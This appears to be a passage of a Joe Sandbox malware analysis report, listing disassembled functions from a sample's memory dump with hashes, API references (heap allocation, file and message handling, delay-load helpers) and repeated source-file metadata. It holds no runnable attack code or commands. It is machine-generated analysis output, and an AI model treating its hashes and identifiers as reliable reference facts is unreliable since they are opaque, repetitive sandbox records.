                                                                                          • Instruction ID: 761601f64405769615cd2a4b0891b5d1391303ff1c7805730437257d83e7ed27
                                                                                          • Opcode Fuzzy Hash: 3462bfd6da3b75928c917c09da70ad3510b4a74cf4d13e003e01b73e3e1a49ad
                                                                                          • Instruction Fuzzy Hash: FC41B1769006989ADB26EB60CC55FEAB369AF50700F0504EEE48AD7093DF746FC8DB50
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: f98a5f887e2cdd7a8128ebdf9c4f0ccca3203f569da90448218bacfb319626dd
                                                                                          • Instruction ID: 43349fb9e7a9cc8fc86a58fdcc175775ab3a7044579a1ae13ba57125caa7b984
                                                                                          • Opcode Fuzzy Hash: f98a5f887e2cdd7a8128ebdf9c4f0ccca3203f569da90448218bacfb319626dd
                                                                                          • Instruction Fuzzy Hash: 2E21A2B2E40616ABDB15DFB9EC41A6BB7A8FB14314F01063BF505EB781D7709D40C6A8
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003D948A
                                                                                            • Part of subcall function 003C137E: __EH_prolog.LIBCMT ref: 003C1383
                                                                                            • Part of subcall function 003C137E: new.LIBCMT ref: 003C13FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: c5e115c41ee30d6e84c68d33dc495bf53b4d517447f61a0264b7dfee3e9a3305
                                                                                          • Instruction ID: 40bb72823f2b5155ee4edc2e97877904fc9e824bdfd9749f9bcc358c36dddbbe
                                                                                          • Opcode Fuzzy Hash: c5e115c41ee30d6e84c68d33dc495bf53b4d517447f61a0264b7dfee3e9a3305
                                                                                          • Instruction Fuzzy Hash: 0A217F76D042599ACF12DF95E941AEEB7B5AF1A300F1004AFE809AB342D7356E05DF60
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 236129a07f398023d6a4d8df9c001c9b1136bceadf62e566273a5780d2ad79ff
                                                                                          • Instruction ID: a868f38d4f744bf1463007f7648003ed9355ff4c36b51262aea348406c84a6b2
                                                                                          • Opcode Fuzzy Hash: 236129a07f398023d6a4d8df9c001c9b1136bceadf62e566273a5780d2ad79ff
                                                                                          • Instruction Fuzzy Hash: 09118273910529ABCF13AE58CC96FDEB736BF48740F0A452AF815FB252CA318D1187A0
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000000,?,?,?,003E23AA,?,0000015D,?,?,?,?,003E2F29,000000FF,00000000,?,?), ref: 003E5A2E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 05674fc9bdc337eb4a2582644b7de9ae007f423345ecf40d76e3237191862fe7
                                                                                          • Instruction ID: 4134e83c79642634e2491e58521a18e1d9f4fbd63e09f85e492463027baabcb4
                                                                                          • Opcode Fuzzy Hash: 05674fc9bdc337eb4a2582644b7de9ae007f423345ecf40d76e3237191862fe7
                                                                                          • Instruction Fuzzy Hash: D0E06535101AF46AE6332B679C4576A364CAF613ADF164334EC159A5D1DB60DC0081A5
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C5B3A
                                                                                            • Part of subcall function 003CAC66: __EH_prolog.LIBCMT ref: 003CAC6B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 73a5db2a8ee9dff753b018bfe8ece13d3ed2d3a05b3fc18a4307a1cbeaaf773c
                                                                                          • Instruction ID: 048afdd268e640c7f97f200d678a08e481407a9180aaddbdb0f57e44a8f2ddbc
                                                                                          • Opcode Fuzzy Hash: 73a5db2a8ee9dff753b018bfe8ece13d3ed2d3a05b3fc18a4307a1cbeaaf773c
                                                                                          • Instruction Fuzzy Hash: E001D130900AC5DECB06E7A4C415BDDFBE4DF56304F14859EA85A97282DBB42F08D763
                                                                                          APIs
                                                                                          • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 003CA174
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseFind
                                                                                          • String ID:
                                                                                          • API String ID: 1863332320-0
                                                                                          • Opcode ID: d41f42441c78582addea9c79a43b618b79fd08bf7c31fc35724531417abc725e
                                                                                          • Instruction ID: 81f6b8121855fa641e59ae6232e7d1d0dfad72a1258de5ed5b78924ab0d16305
                                                                                          • Opcode Fuzzy Hash: d41f42441c78582addea9c79a43b618b79fd08bf7c31fc35724531417abc725e
                                                                                          • Instruction Fuzzy Hash: B7F0E231408B80EECF236BB48805FDBBBA45F16335F048A0EF1FD86192C27518858723
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C1E93
                                                                                            • Part of subcall function 003C18F6: __EH_prolog.LIBCMT ref: 003C18FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: 74723ca16fa43aa54f414e693dc5fd2c93386e725a7095c7f8298d2877df534a
                                                                                          • Instruction ID: 59096dfe75704ed787741e7a1981010ee96a262ff250b934007585637db19937
                                                                                          • Opcode Fuzzy Hash: 74723ca16fa43aa54f414e693dc5fd2c93386e725a7095c7f8298d2877df534a
                                                                                          • Instruction Fuzzy Hash: F0F0F8B1C102998ECF42EFA8C805BEEBBF1BB09300F0402BED409E7202E7344A04CB91
                                                                                          APIs
                                                                                          • __EH_prolog.LIBCMT ref: 003C1E93
                                                                                            • Part of subcall function 003C18F6: __EH_prolog.LIBCMT ref: 003C18FB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog
                                                                                          • String ID:
                                                                                          • API String ID: 3519838083-0
                                                                                          • Opcode ID: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                          • Instruction ID: fe934b80792783d7e5015e52a8996c8839dec70cc5f2775d2587a356cf1a7a06
                                                                                          • Opcode Fuzzy Hash: e0ae847181b1538d67acaf3b877b1e0c0f52bda45648bd320df295aee16f3314
                                                                                          • Instruction Fuzzy Hash: 2EF098B1C152998ECF51DFA8C845BEEBBF1BB19200F1441BED409E7202E7355A05CB95
                                                                                          APIs
                                                                                          • SetThreadExecutionState.KERNEL32(00000001), ref: 003CF927
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExecutionStateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2211380416-0
                                                                                          • Opcode ID: 99444df6db68e78140b55ee0fb52f677d6a2eaf611f0c88ab16de8733efdaaad
                                                                                          • Instruction ID: 79f656ceca712c0341302549933d1a19aaa2f61db7695a0a5c2c2ec54784cdb6
                                                                                          • Opcode Fuzzy Hash: 99444df6db68e78140b55ee0fb52f677d6a2eaf611f0c88ab16de8733efdaaad
                                                                                          • Instruction Fuzzy Hash: 1DD0125575415626DA1B3368790AFFD260B8FC6714F09007EB1059A3D3CA554C56D3A1
                                                                                          APIs
                                                                                          • GdipAlloc.GDIPLUS(00000010), ref: 003D8B6B
                                                                                            • Part of subcall function 003D8924: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 003D8945
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                          • String ID:
                                                                                          • API String ID: 1915507550-0
                                                                                          • Opcode ID: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                          • Instruction ID: 7e4cd812bd2e9112028cfbc7c05d795dd0d90656842fb02cf544240e60679013
                                                                                          • Opcode Fuzzy Hash: 15c49645ae947bc9d886009c95b2f94d8af3cf3aba4b9e0e598e8e73a7603f1a
                                                                                          • Instruction Fuzzy Hash: B0D0A77261010D7BDF826F61AC02E7D7AE9DB02350F504537BC0499350EE72EE10A251
                                                                                          APIs
                                                                                          • GetFileType.KERNELBASE(000000FF,003C964C), ref: 003C9726
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: FileType
                                                                                          • String ID:
                                                                                          • API String ID: 3081899298-0
                                                                                          • Opcode ID: 3399a7aadbd3e4445bcf047974f642ffe21c25209d99f3275d07277c18a87186
                                                                                          • Instruction ID: 3ca8c7da326ef03b8237e29d9a278d42d9a244acdbb7c5a95c5e47a4d24c6ae9
                                                                                          • Opcode Fuzzy Hash: 3399a7aadbd3e4445bcf047974f642ffe21c25209d99f3275d07277c18a87186
                                                                                          • Instruction Fuzzy Hash: FDD01230033600D58F670E385D0DB656651AB433A6F2ADAEDE065C44A1CB22CC43F740
                                                                                          APIs
                                                                                          • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 003DBF9C
                                                                                            • Part of subcall function 003D991E: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 003D992F
                                                                                            • Part of subcall function 003D991E: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 003D9940
                                                                                            • Part of subcall function 003D991E: TranslateMessage.USER32(?), ref: 003D994A
                                                                                            • Part of subcall function 003D991E: DispatchMessageW.USER32(?), ref: 003D9954
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: Message$DispatchItemPeekSendTranslate
                                                                                          • String ID:
                                                                                          • API String ID: 4142818094-0
                                                                                          • Opcode ID: a2ae2c2100d3e206ccdd172e1b6b26e894fce44bb7c8e1e08ce7e49beafb6a52
                                                                                          • Instruction ID: b26abdc85292f520fbc5c6256b69a7b8028197db3af7e5ad754800819e519434
                                                                                          • Opcode Fuzzy Hash: a2ae2c2100d3e206ccdd172e1b6b26e894fce44bb7c8e1e08ce7e49beafb6a52
                                                                                          • Instruction Fuzzy Hash: 6CD09E72144300EAD6122B51DE06F1ABAA6BB88B04F004559B744740F2C6729D30EB06
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC738
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 9f67445b3375863889f208fdae97344cb958d6b1e43f2e6a4056c14fdb2a82b3
                                                                                          • Instruction ID: b4743315bc1b00409883483926f8a506238bc7801bf1fa1c73afb7bdc317e5af
                                                                                          • Opcode Fuzzy Hash: 9f67445b3375863889f208fdae97344cb958d6b1e43f2e6a4056c14fdb2a82b3
                                                                                          • Instruction Fuzzy Hash: DBB012E727860B7C3D0B92403D42C37010CC0C0B24330555FF500D8340E8403C44C632
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC738
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: eb37e7461816a23f34d43edb367200c80a5ecc1cf2be9e2133df32e78cd59d70
                                                                                          • Instruction ID: d5179218928f0083a66cd2f2197b7ea26083c42c073e3c7e919d7a94b977f5f6
                                                                                          • Opcode Fuzzy Hash: eb37e7461816a23f34d43edb367200c80a5ecc1cf2be9e2133df32e78cd59d70
                                                                                          • Instruction Fuzzy Hash: BDB012D727860B7D394BD2043F02C37010CC0C0B14330541FF504C4340E8401C05C632
                                                                                          APIs
                                                                                          • ___delayLoadHelper2@8.DELAYIMP ref: 003DC738
                                                                                            • Part of subcall function 003DCABC: DloadReleaseSectionWriteAccess.DELAYIMP ref: 003DCB39
                                                                                            • Part of subcall function 003DCABC: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 003DCB4A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2049801329.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2049771880.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049846377.00000000003F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049871100.000000000041A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2049975302.000000000041C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_3c0000_d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.jbxd
                                                                                          Similarity
                                                                                          • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                          • String ID:
                                                                                          • API String ID: 1269201914-0
                                                                                          • Opcode ID: 4d9168f1129fbf244a4fc5c9b7f48f4de068babf8689a93d48c17fa8bc0de683
                                                                                          • Instruction ID: 4fa32026bda7bcaf8cf588de72bc18770301e7cab9f1492e41a9bf51ce5e3ded
